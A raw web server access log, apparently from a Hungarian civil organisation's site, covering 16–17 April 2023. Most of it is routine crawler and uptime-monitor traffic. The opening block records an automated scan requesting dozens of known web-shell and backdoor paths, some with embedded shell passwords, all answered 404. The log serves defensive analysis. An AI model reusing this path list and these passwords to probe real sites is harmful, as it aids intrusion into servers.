185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //02.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wp.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //404.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //403.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //admin.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //good.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wp-content/themes/wp-pridmag/init.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //radio.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wp-includes/1index.php?pass=am*guAW8.ryDgz-TYF HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //1index.php?pass=am*guAW8.ryDgz-TYF HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wp_wrong_datlib.php?pass=stusa HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //2index.php?pass=am*guAW8.ryDgz-TYF HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //autoload_classmap.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:10 +0200] "GET //wikindex.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //1h6j5.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wp-admin/setup-config.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wp-admin/xleet.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wp-content/fw.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wp-admin/fx.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //4price.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //utchiha.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wp-admin/priv8.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wp-admin/rss.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //uploads/xleet.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //upload.php?mr=exe3 HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //about.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wp-includes/customize/class-wp-customize-nav-menu.php?new HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //ALFA_DATA/alfacgiapi/ups.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //3index.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //alfa.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //old-index.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //baindex.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wikindex.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //doc.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //haxor.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //marijuana.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //mass.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //mini.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //priv8.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //shell.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //small.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wso.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //mininew.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //xleet.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //1337.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wxo.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //wp-info.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //up-kon.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:11 +0200] "GET //hehe.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //3x.php?3x=3x HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //xmlrqc.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wp-blog.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //xwxx.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wp-content/plugins/fighter/fk.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wp-x.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //xl.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wp-god.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wp-easy.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wp-content/plugins/easybusy/wp-blog.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //DKIZ.php?DKIZ HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //pi.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wp-includes/assets/pi.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //XxX.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //new-index.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //xml.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wp_logx.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wp-content/upload.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //crypted.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wpx.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //ini.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET /xx.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //reminder.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //wp-content/plugins//masterx/wpx.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //image/screenshot_1.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //screenshot_1.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //mad.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //admin/controller/extension/wpm.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //xlt.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //xl.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //lufix.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //uploads/up.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //images/vuln.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //up.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:12 +0200] "GET //media-admin.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:13 +0200] "GET //1index.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:13 +0200] "GET //payout.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:13 +0200] "GET //google.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:13 +0200] "GET //srx.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:13 +0200] "GET //x.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:13 +0200] "GET //upload.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
185.241.208.77 - - [16/Apr/2023:23:16:13 +0200] "GET //ups.php HTTP/1.1" 404 1181 "-" "Go-http-client/1.1"
49.12.13.109 - - [16/Apr/2023:23:24:53 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
66.249.72.28 - - [16/Apr/2023:23:42:16 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.24 - - [16/Apr/2023:23:42:17 +0200] "GET /halozatok/JMCS/mukodes/index.html HTTP/1.1" 200 10352 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
212.237.51.151 - - [17/Apr/2023:00:05:03 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
212.237.23.143 - - [17/Apr/2023:00:55:11 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
212.237.51.151 - - [17/Apr/2023:01:37:58 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
91.233.21.70 - - [17/Apr/2023:01:44:23 +0200] "GET /.well-known/pki-validation/654F5A07454AB97F5BE19903060C2E65.txt HTTP/1.1" 404 1181 "-" "COMODO DCV"
91.233.21.70 - - [17/Apr/2023:01:44:23 +0200] "GET /.well-known/pki-validation/9138EDAACA64CC1E5157059ECE516740.txt HTTP/1.1" 404 1181 "-" "COMODO DCV"
66.249.72.28 - - [17/Apr/2023:01:54:37 +0200] "GET /new/hirek/szabads%C3% HTTP/1.1" 400 1163 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
54.202.10.42 - - [17/Apr/2023:02:07:17 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
35.92.125.211 - - [17/Apr/2023:02:07:37 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
34.221.227.233 - - [17/Apr/2023:02:07:42 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
34.221.227.233 - - [17/Apr/2023:02:07:45 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
54.201.165.54 - - [17/Apr/2023:02:12:49 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
54.201.165.54 - - [17/Apr/2023:02:12:50 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
34.222.102.48 - - [17/Apr/2023:02:15:54 +0200] "GET /favicon.ico HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
34.222.102.48 - - [17/Apr/2023:02:15:55 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36"
212.237.23.143 - - [17/Apr/2023:02:32:37 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
212.237.51.151 - - [17/Apr/2023:03:11:52 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
52.167.144.76 - - [17/Apr/2023:03:53:15 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
49.12.13.109 - - [17/Apr/2023:04:10:57 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
185.191.171.6 - - [17/Apr/2023:04:13:20 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.5 - - [17/Apr/2023:04:13:20 +0200] "GET /konferenciak/05emla/index.html HTTP/1.1" 200 22316 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.8 - - [17/Apr/2023:04:13:23 +0200] "GET /sitemap.xml HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
54.36.149.88 - - [17/Apr/2023:04:30:24 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
185.191.171.35 - - [17/Apr/2023:04:37:26 +0200] "GET /new/dossziek/hirek HTTP/1.1" 200 8525 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.45 - - [17/Apr/2023:04:40:43 +0200] "GET /new/projektek/2013-2014-elmaradott-t%C3%A9rs%C3%A9gek-civil-szervezeteinek-r%C3%A9szv%C3%A9telre-k%C3%A9pes%C3%ADt%C3%A9se HTTP/1.1" 200 12132 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.24 - - [17/Apr/2023:04:48:45 +0200] "GET /new/projektek/m%C5%B1k%C3%B6d%C3%A9si-p%C3%A1ly%C3%A1zat-2017-18 HTTP/1.1" 200 11920 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.36 - - [17/Apr/2023:05:04:51 +0200] "GET /new/en/projects/description-our-projects-hungarian HTTP/1.1" 200 7312 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
49.12.13.109 - - [17/Apr/2023:05:10:11 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
185.191.171.10 - - [17/Apr/2023:05:31:14 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.17 - - [17/Apr/2023:05:31:36 +0200] "GET /aktualis/108autopalya/level/index.html HTTP/1.1" 200 61871 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
52.167.144.55 - - [17/Apr/2023:05:47:46 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.169 - - [17/Apr/2023:05:47:55 +0200] "GET /new/content/civil-szervezet-%E2%80%93-t%C3%A1rsadalmi-szervezet-%E2%80%93-civil-t%C3%A1rsas%C3%A1g-az-%C3%BAj-civil-t%C3%B6rv%C3%A9ny-fogalmi-%C3%BAj%C3%ADt%C3%A1sai HTTP/1.1" 200 18521 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.167 - - [17/Apr/2023:05:48:09 +0200] "GET /new/modules/filefield/filefield.css?l HTTP/1.1" 200 1986 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.167 - - [17/Apr/2023:05:48:09 +0200] "GET /new/modules/system/defaults.css?l HTTP/1.1" 200 757 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.167 - - [17/Apr/2023:05:48:09 +0200] "GET /new/modules/system/system.css?l HTTP/1.1" 200 10020 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.167 - - [17/Apr/2023:05:48:09 +0200] "GET /new/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css?l HTTP/1.1" 200 166 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.167 - - [17/Apr/2023:05:48:09 +0200] "GET /new/sites/default/themes/nosza/css/nosza.css?l HTTP/1.1" 200 10555 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.115 - - [17/Apr/2023:05:48:10 +0200] "GET /new/modules/system/system-menus.css?l HTTP/1.1" 200 935 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.169 - - [17/Apr/2023:05:48:13 +0200] "GET /new/modules/node/node.css?l HTTP/1.1" 200 740 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.227 - - [17/Apr/2023:05:48:13 +0200] "GET /new/modules/user/user.css?l HTTP/1.1" 200 1127 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.227 - - [17/Apr/2023:05:48:13 +0200] "GET /new/sites/default/themes/nosza/print.css?l HTTP/1.1" 200 1247 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.76 - - [17/Apr/2023:05:48:19 +0200] "GET /new/sites/all/modules/cck/theme/content-module.css?l HTTP/1.1" 200 2397 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
52.167.144.76 - - [17/Apr/2023:05:48:19 +0200] "GET /new/sites/default/themes/nosza/css/menu_style.css HTTP/1.1" 200 4749 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
40.77.167.169 - - [17/Apr/2023:05:48:23 +0200] "GET /new/sites/default/themes/nosza/scripts/search.js HTTP/1.1" 200 466 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36"
185.181.60.12 - - [17/Apr/2023:06:04:55 +0200] "GET / HTTP/1.1" 200 1010 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.54"
49.12.13.109 - - [17/Apr/2023:06:09:25 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
66.249.72.212 - - [17/Apr/2023:06:15:31 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.72.210 - - [17/Apr/2023:06:15:32 +0200] "GET /3kutat/REVkutatas/5PR/index.html HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.49 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
114.119.133.89 - - [17/Apr/2023:06:22:40 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
185.191.171.21 - - [17/Apr/2023:06:25:46 +0200] "GET /kutat/REVkutatas/3gazdalkodas/index.html HTTP/1.1" 200 88137 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.35 - - [17/Apr/2023:06:41:01 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.36 - - [17/Apr/2023:06:41:09 +0200] "GET /new/news HTTP/1.1" 200 15233 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
212.237.51.151 - - [17/Apr/2023:06:47:52 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.4_(alertalligator.com)"
180.163.220.43 - - [17/Apr/2023:07:03:31 +0200] "GET / HTTP/1.1" 200 1010 "http://nosza.hu/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36; 360Spider"
185.191.171.26 - - [17/Apr/2023:07:16:01 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.37 - - [17/Apr/2023:07:16:02 +0200] "GET /halozatok/kerekasztal/memo1/index.html HTTP/1.1" 200 26344 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.35 - - [17/Apr/2023:07:25:34 +0200] "GET /new/projektek/dossziek HTTP/1.1" 200 8401 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.20 - - [17/Apr/2023:07:28:08 +0200] "GET /new/dossziek/publikaciok HTTP/1.1" 200 8283 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.15 - - [17/Apr/2023:07:43:11 +0200] "GET /konferenciak/041memo/index.html HTTP/1.1" 200 34889 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
49.12.13.109 - - [17/Apr/2023:07:46:53 +0200] "HEAD / HTTP/1.1" 200 0 "-" "Alert_Alligator_webmonitoring_service_1.6.3_(alertalligator.com)"
185.191.171.24 - - [17/Apr/2023:07:52:29 +0200] "GET /aktualis/109kozigazg/index.html HTTP/1.1" 200 7627 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.13 - - [17/Apr/2023:08:04:42 +0200] "GET /robots.txt HTTP/1.1" 404 1181 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
185.191.171.43 - - [17/Apr/2023:08:04:43 +0200] "GET /aktualis/1gyikNCA/miniszter/index.html HTTP/1.1" 200 11200 "-" "Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)"
